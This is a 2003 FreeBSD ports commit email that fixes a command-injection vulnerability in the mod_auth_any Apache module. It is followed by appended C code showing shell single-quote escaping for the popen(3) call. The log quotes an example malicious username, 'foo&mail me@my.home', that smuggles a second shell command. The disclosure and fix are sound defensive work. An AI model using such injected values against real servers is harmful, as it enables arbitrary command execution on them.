From owner-cvs-all Mon Mar 24 20:23:15 2003
Delivered-To: cvs-all@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E7E9937B401; Mon, 24 Mar 2003 20:23:11 -0800 (PST)
Received: from repoman.freebsd.org (repoman.freebsd.org [216.136.204.115]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8FA7243F75; Mon, 24 Mar 2003 20:23:11 -0800 (PST) (envelope-from lioux@FreeBSD.org)
Received: from repoman.freebsd.org (localhost [127.0.0.1]) by repoman.freebsd.org (8.12.6/8.12.6) with ESMTP id h2P4NB0U096805; Mon, 24 Mar 2003 20:23:11 -0800 (PST) (envelope-from lioux@repoman.freebsd.org)
Received: (from lioux@localhost) by repoman.freebsd.org (8.12.6/8.12.6/Submit) id h2P4NBam096804; Mon, 24 Mar 2003 20:23:11 -0800 (PST)
Message-Id: <200303250423.h2P4NBam096804@repoman.freebsd.org>
From: Mario Sergio Fujikawa Ferreira
Date: Mon, 24 Mar 2003 20:23:11 -0800 (PST)
To: ports-committers@FreeBSD.org, cvs-ports@FreeBSD.org, cvs-all@FreeBSD.org
Subject: cvs commit: ports/www/mod_auth_any Makefile ports/www/mod_auth_any/files bash_single_quote_escape_string.c patch-mod_auth_any.c
X-FreeBSD-CVS-Branch: HEAD
X-Spam-Status: No, hits=0.0 required=5.0 tests=none version=2.50
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp)
Sender: owner-cvs-all@FreeBSD.ORG
Precedence: bulk
List-ID: <cvs-all.FreeBSD.ORG>
X-Loop: FreeBSD.ORG

lioux       2003/03/24 20:23:11 PST

  FreeBSD ports repository

  Modified files:
    www/mod_auth_any     Makefile
  Added files:
    www/mod_auth_any/files bash_single_quote_escape_string.c
                         patch-mod_auth_any.c
  Log:
  o Fix vulnerability that allows execution of arbitrary commands on the
    server with the uid of the apache process.
  Background [1]:
  "The module accepts a username and password from the web client, passes
  them to a user-space executable (using popen(3), which invokes a shell)
  and waits for a response in order to authenticate the user. The password
  is quoted on the popen() command line to avoid interpretation of shell
  special chars, but the username is not. Thus a malicious user can execute
  commands by supplying an appropriately crafted username. (e.g.
  "foo&mail me@my.home

  [1]

  Obtained from:  mod_auth_any CVS [2], nalin@redhat.com [3]

  Revision  Changes    Path
  1.6       +5 -0      ports/www/mod_auth_any/Makefile
  1.1       +45 -0     ports/www/mod_auth_any/files/bash_single_quote_escape_string.c (new)
  1.1       +37 -0     ports/www/mod_auth_any/files/patch-mod_auth_any.c (new)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe cvs-all" in the body of the message
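The fix described in the log quotes the username the same way the password already was. As an added illustration (not the port's own bash_single_quote_escape_string.c or patch), the routine below shows the single-quote escaping that makes a popen(3) argument inert to the shell, and a command builder that applies it to both fields; the helper path and function names are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Wrap `in` in single quotes for a POSIX shell, rewriting each embedded
 * single quote as '\'' (close quote, escaped quote, reopen). Inside single
 * quotes the shell treats &, |, ;, $ and everything else literally, so a
 * crafted username cannot terminate the command. Returns a malloc()ed
 * string, or NULL on allocation failure. */
char *shell_single_quote(const char *in)
{
    size_t extra = 0;
    for (const char *p = in; *p; p++)
        if (*p == '\'')
            extra += 3;                   /* one byte ' grows to four */
    char *out = malloc(strlen(in) + extra + 3);   /* two quotes + NUL */
    if (out == NULL)
        return NULL;
    char *o = out;
    *o++ = '\'';
    for (const char *p = in; *p; p++) {
        if (*p == '\'') {
            memcpy(o, "'\\''", 4);
            o += 4;
        } else {
            *o++ = *p;
        }
    }
    *o++ = '\'';
    *o = '\0';
    return out;
}

/* Build the popen(3) command line with BOTH fields quoted (the original
 * module quoted only the password). `helper` is a hypothetical path to the
 * authentication executable. Returns the length written, or -1 on error. */
int build_auth_command(char *buf, size_t buflen, const char *helper,
                       const char *user, const char *pass)
{
    char *qu = shell_single_quote(user);
    char *qp = shell_single_quote(pass);
    int n = -1;
    if (qu != NULL && qp != NULL)
        n = snprintf(buf, buflen, "%s %s %s", helper, qu, qp);
    free(qu);
    free(qp);
    return (n < 0 || (size_t)n >= buflen) ? -1 : n;
}
```

Quoting is the minimal fix; avoiding the shell entirely with fork(2)/execve(2) and an argv array removes the problem class rather than escaping it.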